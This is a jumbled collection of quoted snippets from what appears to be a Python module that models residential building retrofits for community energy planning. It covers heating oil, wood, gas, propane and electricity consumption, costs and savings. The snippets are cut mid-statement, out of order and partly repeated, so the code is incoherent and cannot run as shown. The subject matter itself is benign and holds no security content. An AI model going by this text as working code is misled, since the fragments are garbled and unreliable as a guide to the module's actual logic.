self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption", "heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline", "baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\" HF_price =", "Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel", "Attributes ---------- init_HF : float initial heating oil consumption init_wood : float initial", "self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost()", "/ 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal", "(kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane", "= self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction", "where the 6000.0 # comes from. 
con_threshold = self.comp_specs['min kWh per household'] yr", "self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\"))", "scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas", "potential improvements to heating efficiency of residential buildings (homes). Consumption and savings are", "dictionary component specific data for a community. Initial value: 'Residential Buildings' section of", "(kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential:", "self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed", "savings created by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year)", "Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating", "Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating", "Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost", "---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption", "electric savings ($/year) are the difference in the base and proposed fuel costs", "aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class", 
"Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0:", "* (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt,", "Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year)", "Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}):", "(MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\", "electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly", "(self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price", "= diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd", "s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG =", "the number of units that have not been retrofit as of 2010, the", "-------- aaem.community_data : community data module, see information on CommunityData Object aaem.forecast :", "Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost", "float a # of houses cf: float conversion factor Returns ------- float: fuel", ": int Houses that can be retrofit savings_HF : float savings in heating", "wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil", "aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module,", "(gallons/year) Consumption Baseline\", \"Residential: Heating Propane 
(gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane", "fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs()", "EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area", "component output csv in directory Parameters ---------- directory : path output directory \"\"\"", "baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption", "[Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption)", "= \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get", "= {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a", "np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption :", "self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'],", "DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All", "type. 
Attributes ---------- init_HF : float initial heating oil consumption init_wood : float", "calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast :", "aaem.community_data : community data module, see information on CommunityData Object aaem.forecast : forecast", "\"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost", "float savings in heating cordwood consumption savings_gas : float savings in natural gas", "self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost =", "self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All", "dictionary general data for a community. Initial value: 'community' section of community_data comp_specs", "r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption", "baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array", "self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved", "self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost", "# kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital", "msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses", "\"\"\" self.cd[\"electric 
prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh", "electric or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]:", "to run. Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to", "Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane", "= avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \"", "= self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val /", "self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit", "+ \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline", "self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP =", "np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption :", "---------- annual_electric_savings : np.array electric savings ($/year) are the difference in the base", "\"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\",", "gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat -", "sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ----------", "= \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * 
constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh", "(Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG,", "np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil", "self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated", "= self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname =", "total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings", "r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is", "Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\",", "(gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential:", "annual_electric_savings : np.array electric savings ($/year) are the difference in the base and", "print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption", "Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential:", "= \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF", "= 0 # coal,solar, other def 
calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption", "Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag or", "scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~", "the capital costs. Attributes ---------- capital_costs : float total cost of improvements ($)", "int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average", "Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt", "def save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters ----------", "self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0:", "AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics", "#~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg", "Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat", "heating cordwood consumption init_gas : float initial natural gas fuel consumption init_LP :", "\"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year)", "\"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError:", "self.baseline_fuel_wood_consumption * \\ 
(1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\", "data for a community. Initial value: 'community' section of community_data comp_specs : dictionary", "electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost =", "Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost", "kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con", "retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost =", "total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH", "fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\"", "1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH *", "self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost()", "Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating", "kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost", "consumption of electricity for a house. 
Attributes ---------- avg_kWh_consumption_per_HH : float average electric", "init_wood : float initial heating cordwood consumption init_gas : float initial natural gas", "[mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf)", "forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed", "Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con", "def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed", "Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not", "\"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year)", "Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential:", "Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All", "savings_kWh : float savings in electric consumption savings_mmbtu: float total savings in mmbtu", "amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption", "consumption savings_gas : float savings in natural gas fuel consumption savings_LP : float", "All (MMBtu/year) Cost Post Retrofit\", 
\"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential:", "constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler", "self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative,", "total fuel saved. Returns ------- float the total fuel saved in gallons \"\"\"", "self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\",", "if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was", "self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost =", "an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH", "= self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG", "s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost", "Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"]", "average electric consumption per household (kWh/year). 
>= 6000 \"\"\" # 500 average energy", "+ \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption", "calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating", "\"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption", "years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\", "diag or new diagnostics object forecast : forecast community forecast for estimating future", "\\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords", "{'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual Net Benefit,", "= self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None:", "self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\", "1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH", "self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. 
Returns ------- float the total", "electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh", ")['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or", "------- float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] -", "improvements to heating efficiency of residential buildings (homes). Consumption and savings are based", ": np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\", "self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption *", "Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year)", "for a community. Initial value: 'Residential Buildings' section of community_data See also --------", "\"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\",", "self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating", "self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average", "community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost']", "total_consumption : float total consumption for residential buildings HH : float a #", "of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "* elec_price r_elec_cost = 
self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP", "fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year]", "\"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\",", "* (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate", "= self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self,", "self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline", "Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential:", "Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost", "\"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years,", "Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas import DataFrame", "self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con", "runs to completion, False otherwise reason : string lists reason for failure if", "Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": 
self.get_base_HF_use() -\\ self.get_proposed_HF_use(),", "0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings =", "# of houses cf: float conversion factor Returns ------- float: fuel consumed for", "# kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost)", "self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current", "= self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print", "self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array", "self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name,", "a community. 
Initial value: 'community' section of community_data comp_specs : dictionary component specific", "initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total", "price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price =", "summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name", "0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" ) ##", "self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted", "Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric", "Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio,", "(cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year)", "gas fuel consumption init_LP : float initial propane consumption init_kWh : float initial", "of 2010, the performance improvements as a percentage of the pre-retrofit consumption, and", "Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential:", "(1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption,", "np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes", "total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"]", "------- float the total fuel saved in gallons \"\"\" base_heat = \\ 
self.baseline_HF_consumption[:self.actual_project_life]", "self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast", "(gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential:", ": int estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year)", "Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "= \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption", "Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential:", "self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf):", "(gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year)", "self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except", "= \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural", "as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area =", "/ np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total", "baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent", "this component 
